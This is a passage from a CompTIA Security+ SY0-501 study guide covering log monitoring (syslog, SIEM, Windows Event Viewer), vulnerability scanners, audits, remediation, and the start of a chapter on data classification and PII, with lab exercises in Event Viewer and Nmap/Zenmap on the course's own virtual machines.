applications are combined into an NMS SNMP entity, while an agent and its MIB are combined
into a Managed Node SNMP entity.

Syslog
Syslog is a standard by which network devices can send message logs to a common server so they can be
centrally compiled. An administrator can then compare events happening throughout the network;
alternatively, the server can be configured to send alerts when notable events occur. Syslog was developed as
far back as the 1980s, but due to lack of official publication it historically had a large number of often
incompatible implementations. It wasn't until 2009 that the IETF published it as a standardized protocol.
Syslog uses a fairly simple client-server model. Any sort of network device can operate as a syslog client,
logging operational events and sending them to the syslog server. Each message, and logged entry consists of
multiple components. Unlike SNMP, syslog can't be used to poll devices for information. Instead, clients must
be configured to send all relevant information themselves.

Header Contains unique identification for the entry, such as a timestamp along with the generating
device's hostname or IP address.
Facility Describes the type of program that generated the message. Syslog servers can be configured
to process messages from different facilities differently.
Severity level Describes the severity of a logged event on a numerical scale so that logs can be filtered by
importance.
Message Contains the name of the application or service which generated the message, as well as the
message details themselves.

Most of these are pretty self-explanatory, but severity level is particularly important for event logging in
general. Syslog defines eight levels: exactly what each means depends on what application generates them,
but they run the full spectrum from emergency messages about severe error conditions to detailed information
on normal activities that can be used to troubleshoot application functions.
Value Severity level Typical description
0 Emergency An error condition rendering the entire system unusable.

1 Alert A serious failure in a service requiring immediate action.

2 Critical A service failure which may become more severe without quick action.

3 Error An unexpected error that causes a specific operation to fail, but not its underlying
service.

4 Warning An error or problem condition that is immediately harmless or correctable but


might need user review.

5 Notice Unusual events or state changes that are not errors but not routine operations.

6 Informational Normal operational messages about routine system activities.

7 Debug Information useful for advanced troubleshooting or application debugging.

CompTIA Security+ Exam SY0-501 271


Chapter 5: Securing networks / Module D: Monitoring and detection

In practice, syslog can generate an enormous amount of data, especially on large networks, so the challenge in
using it is separating potentially serious incidents from more routine events. You might configure syslog to
record messages only of certain severity levels, or to send alerts to administrators if a message is severe
enough. Likewise, when reviewing logs you might filter them by severity depending on what you're looking
for. Syslog output can even feed into a more sophisticated SIEM system with automated processes to
highlight and notify you about likely problems with a minimum of manual effort.

SIEM
Security Information and Event Management is a software product category rather than a protocol or standard.
It's related to log management software, but compared to traditional log management it puts more emphasis
on making sure that logs are actively reviewed, including real-time analysis and automated alerts. SIEM
software varies a lot, but it tends to share common features.

Exam Objective: CompTIA SY0-501 2.1.9

Aggregation Gathers events from many sources throughout the network, including network devices, host
operating systems, and applications, and consolidated so that they can be reviewed together.
Effective aggregation often requires additional features such as:
 Time synchronization to compensate for mismatched time settings between devices
and allow a clear timeline of events.
 Event deduplication to detect multiple instances of a single event (such as multiple
copies sent of one event) and display it only once in the aggregated totals.

Correlation Analyzes aggregated events in order to find useful data that might need additional human
review. In particular, correlation engines work by finding relationships and trends within a
large number of events, filtering out irrelevant data, and highlighting what is most likely to
be of interest to administrators.
Alerts Recognizes individual events or correlated trends that signify security incidents or other
time-critical issues, and alerts security personnel. Alerts can be triggered by specific events
such as system failures, or ongoing trends like individually innocuous events that might
represent a spreading worm or other network attack. They can be sent to a dashboard in the
software interface, or if more critical can be sent through other channels like email or SMS.
Log retention All aggregated logs, critical or not, can be saved for later analysis or to comply with
organizational or regulatory data retention policies.
Analysis tools Users can apply new search and correlation criteria at any time to apply to stored logs,
performing rapid forensic analysis even on topics real-time analysis didn't identify.

System logs
Not to be confused with syslog, the operating systems of network hosts generally have their own logging
systems which record system and application activities and save them for later review. Even if the information
isn't automatically compiled somewhere centrally on the network, you can always log into the host and
examine logged activities, and you should do so on a scheduled basis or whenever you suspect a problem.
What exactly is logged and its format depends on the operating system, but in general it's similar to syslog:
any given entry has a timestamp, a generating application or service, and a severity level.

Exam Objective: CompTIA SY0-501 2.3.2, 2.3.4


One example is Event Viewer included with Windows. It has three event levels, not dissimilar to their syslog
counterparts: Information, Warning, and Error. Each event includes information such as the program or
service which generated it, the user account which was running the program, and specific information about
the event. Event Viewer actually collects entries into multiple separate logs, in two categories.

272 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

The first category is Windows logs, collect information about system-wide events and legacy applications.

Application Events logged by specific applications. What generates an event log, and what details are
recorded, are up to the writer of the application.
Security Events related to security features, such as failed or successful logon attempts, security policy
changes, or resource use. Exactly what is logged is user-configurable. Uniquely, this log has
two "event levels": Audit Success for successful security events (like a logon with proper
credentials), and Audit Failure for unsuccessful events (like a logon with failed credentials).
Setup Events related to application installations.
System Events generated by Windows components, device drivers, and other system services. System
event types are predetermined by Windows.
Forwarded Events forwarded from other computers. To collect events from a remote computer, you must
Events configure an event subscription relationship between both systems.

The second category is Applications and Services logs. Each of these logs is specific to an application or
Windows component. While a given application or component might also write to Windows logs, it uses its
Application and Services Log file to record information that doesn't have system-wide impact. Events in this
category are grouped into four categories, based on the type of information they represent.

Admin Events relating to a problem that either has well-defined documentation or a clear error
message troubleshooters can use to find a solution.
Operational Events related to occurrences that don't represent well-defined errors. If they're associated
with an application problem they can be used to troubleshoot, but they'll require more user
interpretation.
Analytic Events describing exactly how programs and components are operating. Analytic logs are
generated in large numbers, so are more difficult to look through without need. Hidden by
default.
Debug Events related to debugging and troubleshooting applications during development. Mostly
intended for programmers. Hidden by default.

CompTIA Security+ Exam SY0-501 273


Chapter 5: Securing networks / Module D: Monitoring and detection

Note: Windows Event Viewer is just on example of a logging application. Other operating systems have
their own, and many applications have their own independent logging features. While the overall
methods are similar, the precise information gathered and the terminology used may differ. For example,
access logs might be a generic term for records of user access to specific resources, while legal or
industry regulations might specify minimum standards for audit logs which track the entire process of
financial or data transactions covered by the regulation.

Placing monitoring tools


Regardless of what monitoring tools you're using on your network, you need to place them so that they'll
actually capture the information you need.

Exam Objective: CompTIA SY0-501 3.2.4.1, 3.2.4.2, 3.2.4.3, 3.2.4.12

 Some sensors, such as interface monitors and event logging systems, are built directly into devices.
 Network taps and port mirrors should be placed on chokepoints for critical traffic.
• Gather traffic from the inside interface of a firewall to see what passes through.
• Monitor all traffic to and from segments with critical servers.
 Large volumes of data make manual review difficult. Instead, they should be fed through collection
systems and into correlation engines.
 Remember that monitoring data itself is network traffic which can be lost or altered. Alternatively, it can
interfere with other network traffic.
• Place collection and correlation systems in logically "central" locations relative to the devices and
sensors they monitor to minimize traffic volume.
• Ensure that routes for network monitoring services are resilient enough to let you gather data even
during high load, device failures, or network attacks.
• Regulate monitoring traffic volume to make sure that it doesn't cause congestion that interferes with
normal network traffic.
• Secure monitoring data that might be of use to an attacker, especially network analyzer output which
might contain sensitive information.
• Consider out-of-band transmission for critical or highly sensitive data.

Exercise: Viewing event logs


By default, Windows Event Viewer records a wide variety of system and application events.
Do This How & Why

1. In Windows 7, open Windows Event You can also just type event into the search box.
Viewer.

a) Open the Control Panel.

b) Click System and Security, then View Event Logs is under Administrative Tools.
View Event Logs.

2. Explore the Event Viewer interface. Enlarge or maximize the window as necessary.

274 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Do This How & Why

a) In the left pane, expand the Custom Each has its own log categories. The root folder is Event
Views, Windows Logs, and Viewer (Local).
Applications and Services Logs
folders.

b) With the root folder still selected, It contains four sections: Overview, Summary of
examine the center pane. Administrative Events, Recently Viewed Events, and Log
Summary.

c) Scroll through the Log Summary It has a full list of the available logs on the system, as well as
section. their size, time modified, retention policy, and whether each is
enabled or disabled.

d) View the Summary of They're sorted by severity level. Each category shows the
Administrative Events section. number of events generated in the last hour, last day, and last 7
days.

e) Expand the Information list. Click +. Individual event types have an Event ID, source
process, and the log they're saved to.

f) On the right, examine the Actions It shows the actions you can take with the current selection. In
pane. this case, you can change viewing options, open a saved log,
or connect to another computer.

3. View individual logs and entries.

a) In the Windows Logs folder, click


System.

Each event shows its level, time, source, event ID, and task
category.

b) Select any event from the list. Full details appear in the Preview pane at the center bottom.

c) In the Preview pane, click the You can also view the event's properties as an expandable list
Details tab. or in XML format.

d) Examine the Action pane. In addition to the earlier options, you can search events, view
the selected event's properties in a separate window, copy
them, or save selected events to an external file.

e) Right-click any column heading You can add additional information to the listing for searching
and choose or troubleshooting purposes.
Add/Remove/Columns.

CompTIA Security+ Exam SY0-501 275


Chapter 5: Securing networks / Module D: Monitoring and detection

Do This How & Why

f) Click Cancel.

g) View the Security log. Instead of Level, the Security log shows a Keywords field with
Audit Success or Audit Failure. Otherwise, it looks more or
less the same.

4. Close Event Viewer.

Network security posture


Having the right tools to monitor the network doesn't guarantee you know what to look for. Most of what you
need to do relies on watching for unusual activity and applying heightened scrutiny to parts of the network
you know are at risk, but these respectively rely on you knowing what activity is normal, and what parts of
the network are at risk. Even a signature list of known attack types is based on preexisting knowledge, just
compiled by your IDS vendor rather than yourself.
What this means is that you need to design your network's security posture based on a thorough understanding
of what the network's structure and needs are, and then keep it constantly updated based on changes in
network conditions and potential threats. Like most network-based security, the whole process closely mirrors
that of overall organizational security, but with some particular differences. One is that there's a lot more
focus on the technical details of network devices, protocols, and attack types; another is that due to the
constantly changing nature of technologies policies may need to be updated even more rapidly.
The first part is creating a baseline configuration, a policy document describing the initial settings and
functions of your freshly hardened network. It should include several elements, each reflecting the minimum
security needs that later monitoring and assessments can be compared against.
 Locations on the network of sensitive data and other valuable resources.
 Normal network usage patterns and traffic levels.
 Hardware and software configurations for each type of device on the network. These should be
consistent for devices of similar roles, and include other factors such as physical security. When
possible, pre-configured system images or easily applied security templates should be created reflecting
a baseline configuration.
 Acceptable and unacceptable network usage, including both user policies and application/traffic
guidelines.
 Applicable government or industry regulations for network security.
 Known vulnerabilities and what measures have been taken to mitigate them.

The second part is constant security monitoring of the functional network. This includes monitoring alert
systems and analyzing security logs, but it's not limited to those. You also need to perform regular
vulnerability assessments to verify that the network configuration still meets or exceeds the baseline
requirements. You also need to perform security audits, in-depth reviews of network configuration and use to
make sure that all incidents are responded to properly and that all user behavior and device configurations are
compliant with security policies.
The third part is adhering to a remediation policy. When vulnerability scans or assessments show the actual
state of the network doesn't meet the baseline, the remediation policy allows you to classify the severity of the
problem and formulate a suitable response plan. More broadly, remediation policies shouldn't only include
how to patch holes: they should also include the process for changing the baseline configuration itself when
changes in the network environment justify it.

276 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Vulnerability scanners
There are a wide variety of vulnerability scanning tools: some just generally probe networks to find structures
and openings, some actively test known operating system vulnerabilities, and some are targeted at specific,
frequently attacked applications. They're often similar to, or the same as, the tools used by attackers to scout
out potential targets or infiltrate systems. While this is exactly the point, it also means you should never run
vulnerability scanners without the knowledge and consent of network and security administrators; it's against
nearly every network security policy and doing so could easily result in disciplinary action or even criminal
charges.

Exam Objective: CompTIA SY0-501 2.2.4, 2.2.5, 2.2.6, 2.2.7


The boundaries between a lot of different tools are pretty fuzzy: many scanning tools combine multiple
functions, and there's no universally accepted guideline for what term an application with a given feature set
will call itself. There's even a lot of overlap between monitoring tools and vulnerability scanning tools, though
you can roughly make the distinction that monitoring is the passive gathering of network information through
observation or logging applications, while scanning involves active probing at network devices. In practice,
you'll need to determine what aspects of the network you want to test, and look for a product or combination
of products with all the necessary features.

Protocol analyzer The same sort used in network monitoring. Captures and analyzes packets from the
network to determine their protocols, analyze header info, or capture data. In
scanning context, a protocol analyzer is commonly called a sniffer.
Port scanner Rapidly scans ports on a host or entire subnet, and reports whether they're blocked,
open, or hosting an active service. Port scanning works best for finding open TCP
services, but there are UDP scanners as well. Port scanners are valuable for finding
firewall issues, and rogue or unnecessary servers.
Network mapper Scans ports, but also gathers other system information about hosts on a subnet, such
as host names, operating systems, and server applications. One way network
mappers do this is by banner grabbing: reading routine packets from hosts or their
responses to normal service requests. While these packets don't contain confidential
material, if they reveal the host operating system or details on running services they
can also reveal potential vulnerabilities.
Password cracker Attempts to decipher weak passwords, usually by guessing them very rapidly. Some
are designed to repeatedly attempt to log into a service, but others are focused on
deciphering encrypted messages or password files.
Web application Examines web server applications or even browsers for common vulnerabilities.
vulnerability tester
Database vulnerability Scans database software for vulnerabilities.
tester
Wireless scanner Scans for available Wi-Fi networks and analyzes their security settings. Some can
attempt to crack encryption while others just report openly visible network
information.
Configuration Any scanner that can compare its findings to an audit file reflecting required
compliance scanner security configuration details for the systems, services, or devices it scans. Any
compliance issues are listed separately from or in addition to vulnerabilities. For
example, you could use a compliance scanner to make sure that systems have
correct password policies and event logging configured.
Exploitation A penetration testing tool rather than a vulnerability scanner. Exploitation
framework frameworks are designed to develop and test exploits against vulnerable systems or
applications, but they often can be used to scan more passively for vulnerabilities.

CompTIA Security+ Exam SY0-501 277


Chapter 5: Securing networks / Module D: Monitoring and detection

It's not hard to find a wide variety of software applications that will perform any of the above tasks. Popular
examples of comprehensive vulnerability scanners include the proprietary SAINT and Nessus, and the open
source OpenVAS.

Security audits
How frequent and intensive your security audits are depend entirely on your network's needs and your
security resources. If you're managing a large network protecting a lot of valuable data, audits should be
frequent and comprehensive to make sure nothing's gone awry, but even if your security needs aren't unusual
you still should create and adhere to a formal auditing process.
Potential elements of a security audit include:
 Review of security logs in order to find unusual activities or unreported incidents
 Review of incident response reports, both to verify that responses were appropriate and to detect
particular trends or patterns
 Review of user and administrator activities, in order to verify compliance with network policies
 Review of users and user permissions, to minimize potential for unauthorized access
 Review of device configurations and installed applications for comparison to the security baseline.

Incident reports
Whether you're monitoring the network manually or using automated tools, your hope is to not encounter any
security incidents. You will anyway, of course, so you need reporting mechanisms that convey the severity
and other important details of each incident. Some common report types include the following.

Alarms High-priority notifications of an critical or ongoing incident needing quick response. Alarms
actively notify network administrators or other relevant personnel, in order to ensure a quick
human response to the incident. Alarms are an important feature of IDS and a number of other
security and performance monitoring systems, but you need to integrate them into your
organizational policies rather than handling them in an ad hoc manner. Not only do you need to
make sure that alarms reliably reach the right people, but you need to have appropriate response
procedures for each type of alarm.
Alerts Lower priority than alarms, alerts provide notice of changes in network conditions that may or may
not need administrator response eventually, but aren't immediately critical. An alert still represents
a specific event worthy of note. A system rebooting, a failed login attempt, or detection and
successful quarantining of malware all would generate alerts. Alerts need to be recorded in a way
that it's easy for administrators to review them and determine which need action.
Trends Instead of individually significant events, trends are the aggregate result of many minor events on
the network, especially those which wouldn't need a response individually but taken as a whole
form a meaningful pattern. One example of a short-term trend is a repeating pattern of TCP
connection attempts representing a port scan against the network. A rise in phishing emails aimed
at network users is a longer term trend. Trends can also represent changes in normal activity but
still need a response: even if a sharp increase in normal web traffic is only because of a popular
new service your company is providing, you'll still need to adjust your baseline traffic reports to
reflect it.

Note that some of these terms can also be used for reports by security services or software vendors to
customers and the general public. The principles, and severity levels are fairly similar all the same: you might
receive an alert regarding a newly discovered vulnerability in an application (whether or not a patch is
immediately available), or a security agency might report on changing trends in malware attack types. Either
way, you'll want to pay attention to these reports, and respond to those which might specifically affect your
network.

278 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Network security troubleshooting


After hardening and in between formal assessments, you need to be proactive with security troubleshooting
above and beyond just watching for alerts and scheduling audits. If you miss early signs of a critical server
failing, that's bad, but it's at least something you can fix after the fact if you've got good backups. If you miss
signs of security failures that open the path to a serious data breach, you may not even know you've been
attacked until long after the damage is done.
A big part is just to manually keep an eye out for changes and unusual network behaviors.
 When there's a connectivity or performance issue, or unusual user behavior, consider the possibility of
malicious action. For example, crashes or slowdowns with no apparent other cause might be caused by
DoS attacks.
 Monitor for unauthorized probing or eavesdropping on the network.
 Watch for unauthorized user accounts or rogue devices.
 Keep hosts, devices, and software up to date, importantly including any security software.
 Verify security settings after firmware or software installations or upgrades to make sure they haven't
changed.

One way security holes are introduced is when a technician troubleshooting a network problem disables
security measures. This isn't bad in itself, but you have to make sure to minimize risk.
 Ensure that security is only bypassed in a formal troubleshooting process, and that the process is easy
to follow. When they're in a hurry, users will be distressingly willing to disable firewalls and share
accounts "just because it works that way."
 Disable only security measures immediately relevant to the problem at hand.
 If necessary, isolate or additionally secure particularly sensitive systems or data when other security
measures must be disabled.
 Be sure to re-enable security measures after the problem is solved. If security settings themselves were
the cause of a problem, relax them only enough to minimize other risk.

A major risk of securing the network is making security settings so strict that they interfere with normal
operation. This is a problem because of the disruptions it causes directly, and also because even otherwise
responsible users have an almost supernatural knack for bypassing and compromising safeguards that get in
the way of them doing their jobs. If security measures get in the way and can't be easily fixed, they'll tend to
be bypassed, abandoned, or disabled without notification; policies otherwise or not, you need to make sure
security doesn't get in the way of usability and that conflicts are quickly corrected.
 When hosts or resources are unreachable, check firewall settings and ACLs, opening ports or adding
permissions as necessary.
 Update trusted user permissions to match changing duties: users assigned new tasks they don't have
permissions for is a prime cause of well-intentioned account sharing.
 After hardware or software updates, make sure that no access problems have been introduced.

Remediation
Scans, audits, and reports all will eventually turn up security problems. When they do, you need a remediation
policy for fixing them. While this policy might include specific procedures for likely events, you can't
meaningfully plan for everything that can possibly go wrong. Instead, it's important to create a framework that
can be applied to incidents as they occur.
A critical part of remediation is assigning priority to incidents, not only in terms of the damage they can do
but how time-critical it is to correct them. On one end of the scale, a minor misconfiguration in authentication
settings on an internal network application might still leave the application secure enough that fixing it can

CompTIA Security+ Exam SY0-501 279


Chapter 5: Securing networks / Module D: Monitoring and detection

wait until an administrator has some free time. On the other hand, discovering a critical vulnerability in an
internet facing server holding sensitive data might mean that you have to shut it down and correct the issue
immediately, even if it disrupts business operations. Others are in between: if trend reports show an increase
in a certain type of network attack but you haven't actually seen any signs of it, you might want to schedule a
vulnerability assessment to see if your systems are at risk.
Other important aspects of remediation policy include assigning particular incident types to personnel with
suitable skills and permissions, determining the underlying cause of problems, and adapting the network's
security posture to either prevent the problem from recurring or, if that isn't possible, minimizing its effect on
the network's performance and security.

Exercise: Scanning the network


In this exercise you'll use Nmap, a popular security scanner and network mapper. You could use it on your
network to find open ports, vulnerabilities, or even rogue systems.
Do This How & Why

1. Note the IP addresses of both your


Windows 7 and Windows 2012 VMs.

a) In Windows 7, open a command


window.

b) Type ipconfig.

c) Take note of the IP address for the In Windows 2012, the IP address is 10.10.10.2.
Windows 7 VM.

2. On the Windows 7 desktop, double- Zenmap opens. It's a GUI front end for the Nmap utility in
click Nmap - Zenmap GUI. Windows.

3. Scan for hosts on your subnet.

a) In the Target field, type Nmap uses CIDR notation, so this will scan all addresses in
10.10.10.0 /24. the 10.10.10.0 subnet.

b) From the Profile list, select Ping


scan.

The Command field is automatically updated to show the


command line parameters your scan will use.

280 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Do This How & Why

c) Click Scan.

A few moments later, the IP and MAC addresses of each


responding host appear. There are four responding hosts: the
router, the Windows 2012 server, the hypervisor for the virtual
environment, and the Windows 7 workstation itself.

4. Perform an intense scan on the An intense scan shows much more information about a host.
Windows 2012 system.

a) In the Target field, enter


10.10.10.2.

b) From the Profile list, select


Intense.

c) Click Scan. You should see a lot more information this time, since the
server is running a lot of network services. It takes a while to
complete, but it includes a wide variety of information about
each running service and the operating system itself, including
brand and version. This sort of information would be valuable
to an attacker.

5. Scan the Windows Server 2012 system


again, with its firewall disabled.

a) In Windows Server 2012, open The quickest way is to type Firewall at the Start screen.
Windows Firewall.

b) On the left of the Windows Currently the firewall is on for both public and private
Firewall window, click Turn networks.
Windows Firewall on or off.

c) For domain networks, click Turn


off Windows Firewall.

d) Click OK.

CompTIA Security+ Exam SY0-501 281


Chapter 5: Securing networks / Module D: Monitoring and detection

Do This How & Why

e) In Windows 7, perform an Quick


Scan of the Windows Server 2012
system.

Several more ports are visible even on a less intense scan.


Windows Firewall normally blocks access to these.

f) Choose Intense scan, no ping, and This scan avoids using ping packets, which are filtered by
scan again. some firewalls and can trigger logging or IDS systems. The
intense scan takes longer, but gives much more information.
For example, specific details of listening services are listed.

6. Perform an intense scan of the virtual Its IP address is 10.10.10.1. Nmap detects some open ports on
router. the router, including port 80 for the web interface. It can't
clearly identify the operating system, but one of the top
guesses, FreeBSD, is correct.

7. Explore further results of your Nmap compiles overall network information based on your
scanning. scan results.

a) Observe the left pane. It gives a list of addresses on the subnet. The router even has a
name of pfsense.localdomain. You can select any of these to
show its results in the right pane.

b) With 10.10.10.1 selected, click the Ports 53 (DNS) and 80 (HTTP) are open. Nmap even
Ports/Hosts tab. identified the web server application as lighthttpd 1.4.37: you
could use this to research specific vulnerabilities of that server.

c) On the left, click 10.10.10.2. The Windows server has a whole list of active ports,
representing network services. Many of them aren't very safe
for internet use, which is part of why a LAN should always be
protected by a firewall.

282 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Module D: Monitoring and detection

Do This How & Why

d) Click the Topology tab.

The network is very simple, so all available hosts are within


one hop of the local host.

e) Click the Host Details tab. It shows further details about the selected host.

f) Click the Scans tab. It shows the scans you've performed. You can also save scans
you might want to perform again in the future.

8. Close Zenmap. Don't save your scans.

9. In Windows Server 2012, enable the


firewall.

CompTIA Security+ Exam SY0-501 283


Chapter 5: Securing networks / Module D: Monitoring and detection

Assessment: Monitoring and detection


1. An interface monitor is likely to be one part of a larger monitoring tool. True or false?
 True
 False

2. What SNMP component is a database for a particular device? Choose the best response.
 Agent
 Manager
 MIB
 OID

3. Even though Syslog has been around a very long time, it hasn't always been a well-defined standard. True
or false?
 True
 False

4. What SIEM software feature finds broader trends and relationships formed by individually insignificant
events? Choose the best response.
 Aggregation
 Correlation
 Deduplication
 Synchronization

5. What kind of tool is often called a sniffer? Choose the best response.
 Database vulnerability tester
 Network mapper
 Protocol analyzer
 Wireless analyzer

284 CompTIA Security+ Exam SY0-501


Chapter 5: Securing networks / Summary: Securing networks

Summary: Securing networks


You should now know:
 About network security components, including network ACLs, firewalls, IDS/IPS systems, honeypots,
content filters, load balancers, proxy servers, and UTM solutions.
 How to apply secure transport encryption on multiple layers of the network, including secure
application protocols, Wi-Fi encryption, and VPNs.
 How to harden networks using segmentation and a defense in depth strategy.
 How to use monitoring and detection tools to maintain network performance and security, and how to
evaluate network security posture through a regular monitoring and incident handling process.

CompTIA Security+ Exam SY0-501 285


Chapter 6: Securing hosts and data
You will learn:
 How to secure data
 How to secure hosts and applications
 How to secure mobile devices

CompTIA Security+ Exam SY0-501 287


Chapter 6: Securing hosts and data / Module A: Securing data

Module A: Securing data


As the name implies, the heart of information security is securing information. Wherever it's stored, used, or
transmitted, you need to make sure that all sensitive data is kept safe from the wrong eyes. Using defense in
depth, you can do most of the work by securing the hosts, networks, and user policies around the data itself,
but that's not all of it.
You will learn:
 About data classification and policies
 About the data life cycle
 How to control data access
 How to apply encryption

Classification levels
Not all data needs the same security. It doesn't even make sense just keeping all your organization's data under
strict controls, because that's a lot of work to maintain, and probably inconvenient for users besides.
Someone's bound to get lazy with a bit of information that's clearly harmless, then next someone just takes the
same shortcut with actual company secrets. Instead, you need to create an information classification policy
which defines three things.

Exam Objective: CompTIA SY0-501 5.8.2.1, 5.8.2.2, 5.8.2.3

1. The types of information stored by your company, as grouped by sensitivity level


2. Who needs to access each class of information
3. How each class of information needs to be protected
Governments have a long history of formally classifying information, so they're a good place to look for
information. For example, the US government classifies sensitive information according to what harm its
release could do to national security, using four primary levels.

Top secret The most heavily secured information, which could cause grave danger to national security if
released.
Secret Information which could cause serious danger to national security if released, but is less
sensitive than top secret.
Confidential Information which could cause damage to national security, but is less sensitive than secret.
Unclassified All other information. Some is still only released to law enforcement or other approved
agencies, and the rest is available to any citizen who requests access.

Each level of classified information can only be viewed by people with the corresponding security clearance
or higher. In addition, sensitive compartmentalized information (SCI) has an additional codeword related to
the field of information it's used in, usually indicating particular government programs or areas of knowledge.
Even with the right clearance level, users can't access SCI documents unless they also have the matching SCI
clearance, issued on a need-to-know basis.
To enforce that privacy, each level of classified information has protections according to its sensitivity. It can
only be stored in systems, containers, or facilities rated to its level. Each level has different standards for
physical shipment, and digital data must be transmitted on special networks and protected with approved
encryption methods. Even the destruction of classified documents must be witnessed and logged, and
performed in a way that ensures it can't be recreated.

288 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

Private organizations can define whatever classification schemes they want. For example, yours might use
High, Medium, and Low to mark sensitivity, or Confidential,Proprietary, and Public. The important thing is
that all data is assigned an appropriate sensitivity level, and each level is consistently secured by an
appropriate set of standards.

Note: Remember, data being"Unclassified" or "Public" doesn't mean it gets no security. Even when
information isn't confidential, you still need to protect its availability and integrity.

Personally identifiable information


Personally identifiable information (PII), sometimes known as sensitive personal information (SPI) is a fairly
broad term used to refer to information that can uniquely identify or locate an individual person, or can be
used in conjunction with other information to do so. PII is a legal term rather than a technical one, so exactly
what does or doesn't count depends on your jurisdiction. NIST Special Publication 800-122 defines PII as
follows:

Exam Objective: CompTIA SY0-501 5.2.8.5, 5.2.8.6, 5.8.4


“Any information about an individual maintained by an agency, including (1) any information that can be
used to distinguish or trace an individual‘s identity, such as name, social security number, date and place of
birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to
an individual, such as medical, educational, financial, and employment information.”
As this implies, PII can be a lot of things, and other countries are even more inclusive than the US. Common
information that can qualify as PII, either on its own or in conjunction with other information, include:
 Full name
 Home, email, or IP address
 Telephone number
 Government identification numbers, such as driver's license, passport, or social security/insurance
 Credit card or bank number
 Biometric information
 School or workplace
 Grades or salary
 Age, gender, or race
 Family members

If this is starting to sound like every form you've ever filled out, you've got a good idea how ubiquitous PII is.
PII in the wrong hands enables identity theft, harassment, and general intrusion of privacy; for this reason, its
use and storage is heavily regulated in most nations and by some industry standards. Even were it not,
customers and employees are sensitive about their privacy. Either way, your organization needs to have a clear
and enforced policy recognizing what stored data qualifies as PII, and how that data is secured, used, and
shared with other organizations.
Some industries face stricter PII rules than others, if only because of the types they handle. Examples include:
 Health-related industries must protect Protected Health Information (PHI) attached to individual health
records.
 Educational institutions must protect student records, especially those belonging to minors.
 Any business accepting payment cards is required by its vendor agreement to protect customer payment
data.

CompTIA Security+ Exam SY0-501 289


Chapter 6: Securing hosts and data / Module A: Securing data

Wherever you are and whatever your business is, before you finalize a data classification policy you need to
identify what PII your organization stores. You should also seek a legal opinion on exactly how your local
laws and existing contractual obligations require you to secure it. If you ever do have a serious data breach,
the last thing you want is a fine or lawsuit added on.

Note: PII isn't the only kind of data that might be subject to special requirements. For example, many
public agencies and financial institutions are required by law to retain a wide variety of data, often for
years or permanently, in order to comply with transparency guidelines. While this data must be available
to proper authorities, it's often sensitive material that must be tightly secured otherwise.

Data ownership
Data security often fails at the human level, especially when no one in the organization is quite clear who is
responsible for what part of security. Information security policies should specify various roles in maintaining
or securing valuable data both for organizational purposes and regulatory compliance. In a typical
organization you might have the following roles for any given class of data.

Exam Objective: CompTIA SY0-501 5.8.3

Data owner In this context not the legal owner of intellectual property, but the person in the
organization with ultimate responsibility for keeping data safe and complying with
applicable regulations. For example, the director of Human Resources might be the data
owner for employee files while the treasurer or CFO is the owner of financial data. Data
owners ultimately decide how data is classified and determine the rules for who can access
it.
Data custodian A system administrator responsible for creating and enforcing the technical controls
regarding access to data, under the direction of its owner. Data custodians control user
permissions to access data, implement security controls to keep it safe but available, log
access data, and produce reports for data owners.
Data steward A person responsible for data management from a business and stakeholder perspective.
The data custodian or even owner might have steward responsibilities, but it can be
someone entirely separate. Data stewards ensure that data quality meets business needs,
that data is supported by sufficient metadata to make it easy to use, and that it meets all
regulatory requirements. They also work with stakeholders to create and monitor data
acquisition and dissemination procedures.
Data user Anyone who is given access to data by its owner or custodian. Users are required to
comply with any user policies regarding sensitive data, and to report any potential
incidents to appropriate authorities.
Privacy Officer An executive who oversees the development, implementation, and enforcement of privacy
policies regarding personal employee or customer data. The existence and duties of
privacy officers are specified by many PII and PHI regulations. In many companies this
will be a senior executive position, such as a Chief Privacy Officer (CPO). Privacy officers
must work with all applicable data owners in the organization to make sure that personal
information is appropriately protected.

290 CompTIA Security+ Exam SY0-501


Chapter 6: Securing hosts and data / Module A: Securing data

States of data
In addition to how sensitive it is, what you need to do to secure data depends on the state it occupies.
Generally speaking there are three states of digital data, even if there's some debate where some of the
boundaries are.

Exam Objective: CompTIA SY0-501 6.1.20, 6.1.21, 6.1.22

Data in transit Data that's being transmitted through a network. It can be further subdivided between data
on trusted networks such as a corporate intranet, and data on an untrusted network such as
the internet. Transit is when data is most exposed to attack, so protecting it is one of the
primary goals of network security. Data on private networks can be secured by restricting
unauthorized access, while data on public networks must be protected via cryptography.
Data at rest Data that's being stored on some sort of persistent medium, such as disk or tape. It can be
further divided according to whether it's connected to an active or networked computer, or is
in storage on offline media. Data at rest is primarily protected by physical security and, if
applicable, host security. Encryption can add extra security, especially for easily stolen
external media and portable devices.
Data in use Data being actively processed or stored in non-persistent form. At the least, it includes data
in system memory, caches, or CPU registers. It can also include databases being actively
modified, or other files subject to frequent change but technically on persistent media. Data
in use can be compromised by rootkits or other malware, as well as some other attacks. In
the past, it was the least likely to be secured, but that's changing; operating system hardening
has gradually made it more difficult to read data used by other applications, and memory
encryption technology is being adopted by many high security systems.

Data in any state can include metadata, or data that primarily contains information about other data. For
example, files have creation and modification dates, user permissions, and possibly tags or thumbnails.
Metadata on an email message includes its sender and recipient as well as message-specific information like
the subject line. Metadata can be valuable to an attacker, and it's often not kept as secure as the data it
describes.
While you should ensure that data in each state has appropriate security, you need to look at the three as a
unified whole, part of the overall data life cycle. It's all the more important as technology evolves: today's
data is increasingly handled on networked or cloud systems where it's hard to really keep track of what state
any particular piece of data is in at a given moment.

The data life cycle


When you design a data policy, it needs to govern the entire life cycle of each data class. This should address
security questions related to each step of its use. The answers to each question should not only be based off of
best security practices, but also off of specific regulatory requirements for any data you keep.

1. Creation/Acquisition How will data be classified when it is created or acquired from other sources?What
special restrictions apply to data acquired from customers or business partners?
2. Use/Storage Who can access data of each classification?How should data be protected at rest
and in transit?Can the data be stored on USB devices or cloud services?
3. Retention/Archival How long will data be kept when it's no longer in use?How will archived data be
stored and protected?
4. Wiping/Disposal How will sensitive files be deleted from media when no longer in use?How will
